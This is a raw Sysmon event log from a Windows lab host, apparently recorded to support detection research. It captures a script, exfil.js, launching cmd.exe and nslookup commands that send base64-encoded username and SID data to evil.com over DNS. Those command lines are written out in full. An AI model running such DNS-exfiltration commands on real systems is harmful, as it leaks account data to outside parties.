10341000x8000000000000000196305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.441{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-AB3E-000000005F02}7336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.441{2E1864BB-17A1-629A-783D-000000005F02}5552216C:\Windows\System32\WScript.exe{2E1864BB-17AF-629A-AB3E-000000005F02}7336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.455{2E1864BB-17AF-629A-AB3E-000000005F02}7336C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlslo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.441{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljuicil.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.425{2E1864BB-17AF-629A-A93E-000000005F02}70085724C:\Windows\system32\conhost.exe{2E1864BB-17AF-629A-AA3E-000000005F02}684C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.425{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.425{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.425{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.425{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.425{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-AA3E-000000005F02}684C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.424{2E1864BB-17AF-629A-A83E-000000005F02}58961152C:\Windows\system32\cmd.exe{2E1864BB-17AF-629A-AA3E-000000005F02}684C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.424{2E1864BB-17AF-629A-AA3E-000000005F02}684C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AF-629A-A83E-000000005F02}5896C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljuicil.tmp 2>&1 10341000x8000000000000000196293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.404{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AF-629A-A93E-000000005F02}7008C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.404{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AF-629A-A93E-000000005F02}7008C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.388{2E1864BB-17AF-629A-A93E-000000005F02}70085724C:\Windows\system32\conhost.exe{2E1864BB-17AF-629A-A83E-000000005F02}5896C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.358{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-A93E-000000005F02}7008C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.358{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.358{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.358{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.358{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.358{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-A83E-000000005F02}5896C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.341{2E1864BB-17A1-629A-783D-000000005F02}55527404C:\Windows\System32\WScript.exe{2E1864BB-17AF-629A-A83E-000000005F02}5896C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.357{2E1864BB-17AF-629A-A83E-000000005F02}5896C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljuicil.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.341{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlehw.tmpMD5=1BE0CADB6C0F327AC397E79E76114FEF,SHA256=8716405641FB55158926538865C7AE114B3765D3AEA889805DB014655C2FA08F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.285{2E1864BB-17AF-629A-A63E-000000005F02}22562848C:\Windows\system32\conhost.exe{2E1864BB-17AF-629A-A73E-000000005F02}7220C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.269{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.269{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.269{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.269{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.269{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-A73E-000000005F02}7220C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.269{2E1864BB-17AF-629A-A53E-000000005F02}3364780C:\Windows\system32\cmd.exe{2E1864BB-17AF-629A-A73E-000000005F02}7220C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.272{2E1864BB-17AF-629A-A73E-000000005F02}7220C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com 